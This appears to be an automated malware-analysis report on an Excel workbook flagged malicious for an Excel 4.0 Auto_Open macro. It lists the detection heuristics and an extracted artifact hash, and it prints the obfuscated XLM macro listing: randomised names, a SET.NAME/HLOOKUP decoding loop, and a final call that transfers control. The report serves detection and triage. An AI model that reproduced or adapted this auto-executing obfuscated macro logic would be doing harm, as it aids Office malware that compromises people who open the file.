MALICIOUS
Risk Score: 140
Heuristics: 3
- Excel 4.0 Auto_Open defined name (critical, OLE_XLM_AUTOOPEN_DEFINEDNAME): oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
- XLM Auto_Open with dangerous formula APIs (critical, OLE_XLM_DANGEROUS_FN): Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
- Excel 4.0 (XLM) macro sheet present (medium, OLE_XLM_AUTOOPEN): Workbook contains an Excel 4.0 macro sheet sub-stream. XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
Extracted artifacts: 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| xlm_macros.txt | xlm-macro | oletools.olevba.extract_all_macros (XLM macro listing) | 6768 bytes |

SHA-256: 4fc10d3e4a1fedf34b495d4752fa67aa7cce1742fda04d635a72692b0e611859

Preview script (first 1,000 lines of the extracted script):
' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet
' 0085 17 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - qikWPpVW
' 0018 21 LABEL : Cell Value, String Constant - AHvhFb len=0
' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!G172
' 0018 21 LABEL : Cell Value, String Constant - cgISsm len=0
' 0018 27 LABEL : Cell Value, String Constant - EAfNhxVPgTyD len=0
' 0018 25 LABEL : Cell Value, String Constant - ebbvQuUNnG len=0
' 0018 27 LABEL : Cell Value, String Constant - fdauvlTeZzdv len=0
' 0018 24 LABEL : Cell Value, String Constant - hCYQDQpYY len=0
' 0018 22 LABEL : Cell Value, String Constant - hDVJKTJ len=0
' 0018 23 LABEL : Cell Value, String Constant - kelmEava len=0
' 0018 22 LABEL : Cell Value, String Constant - lhFsyTB len=0
' 0018 27 LABEL : Cell Value, String Constant - nayndhveRckx len=0
' 0018 27 LABEL : Cell Value, String Constant - NSbnVMPmZiBJ len=0
' 0018 24 LABEL : Cell Value, String Constant - qIskjLPws len=0
' 0018 26 LABEL : Cell Value, String Constant - SxrvRIZWiYZ len=0
' 0018 21 LABEL : Cell Value, String Constant - wiAlrY len=0
' 0018 22 LABEL : Cell Value, String Constant - YchywBj len=0
' 0018 24 LABEL : Cell Value, String Constant - YYUVIzhyy len=0
' 0018 26 LABEL : Cell Value, String Constant - zERjMuEGocm len=0
' 0018 23 LABEL : Cell Value, String Constant - ZFTtpXSk len=0
' 0018 21 LABEL : Cell Value, String Constant - zoGYqR len=0
' 0018 26 LABEL : Cell Value, String Constant - ZXfgLUsLDDQ len=0
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 002a 2 PRINTHEADERS : Print Row/Column Labels
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' 00fd 10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
' qikWPpVW,P86,"",949.00000000000000000000
' qikWPpVW,P87,"",322.00000000000000000000
' qikWPpVW,P88,"",107.00000000000000000000
' qikWPpVW,P89,"",328.00000000000000000000
' qikWPpVW,P90,"",327.00000000000000000000
' qikWPpVW,P91,"",-123.00000000000000000000
' qikWPpVW,G93,"SET.NAME("zERjMuEGocm",0+VALUE("0"))",""
' qikWPpVW,G95,"SET.NAME("lhFsyTB",zERjMuEGocm)",""
' qikWPpVW,G97,"SET.NAME("kelmEava",zERjMuEGocm)",""
' qikWPpVW,G102,"SET.NAME("YchywBj",COUNTA(cgISsm))",""
' qikWPpVW,G105,"SET.NAME("YYUVIzhyy",COUNTA(wiAlrY))",""
' qikWPpVW,G108,[],""
' qikWPpVW,G110,"SET.NAME("ZXfgLUsLDDQ","")",""
' qikWPpVW,G112,"lhFsyTB",""
' qikWPpVW,G115,"SET.NAME("qIskjLPws",HLOOKUP("*",cgISsm,lhFsyTB,FALSE))",""
' qikWPpVW,G120,"ebbvQuUNnG",""
' qikWPpVW,G123,"SET.NAME("NSbnVMPmZiBJ",zERjMuEGocm)",""
' qikWPpVW,G125,[],""
' qikWPpVW,G129,"NSbnVMPmZiBJ",""
' qikWPpVW,G131,"fdauvlTeZzdv",""
' qikWPpVW,G134,"SxrvRIZWiYZ",""
' qikWPpVW,G138,"hDVJKTJ",""
' qikWPpVW,G141,"SET.NAME("nayndhveRckx",VALUE(HLOOKUP("*",wiAlrY,hDVJKTJ,FALSE)))",""
' qikWPpVW,G144,"hCYQDQpYY",""
' qikWPpVW,G147,"ZXfgLUsLDDQ",""
' qikWPpVW,G151,"kelmEava",""
' qikWPpVW,G154,NEXT(),""
' qikWPpVW,G156,"EAfNhxVPgTyD",""
' qikWPpVW,G158,[],""
' qikWPpVW,G160,"zoGYqR",""
' qikWPpVW,G165,NEXT(),""
' qikWPpVW,G167,RETURN(),""
' qikWPpVW,G196,"SET.NAME("ZFTtpXSk",G93)",""
' qikWPpVW,G199,"cgISsm",""
' qikWPpVW,G201,"SET.NAME("wiAlrY",R41C13)",""
' qikWPpVW,G204,"SET.NAME("zoGYqR",213)",""
' qikWPpVW,G208,"SET.NAME("AHvhFb",7)",""
' qikWPpVW,G212,ZFTtpXSk(),""
' qikWPpVW,G213,HALT(),""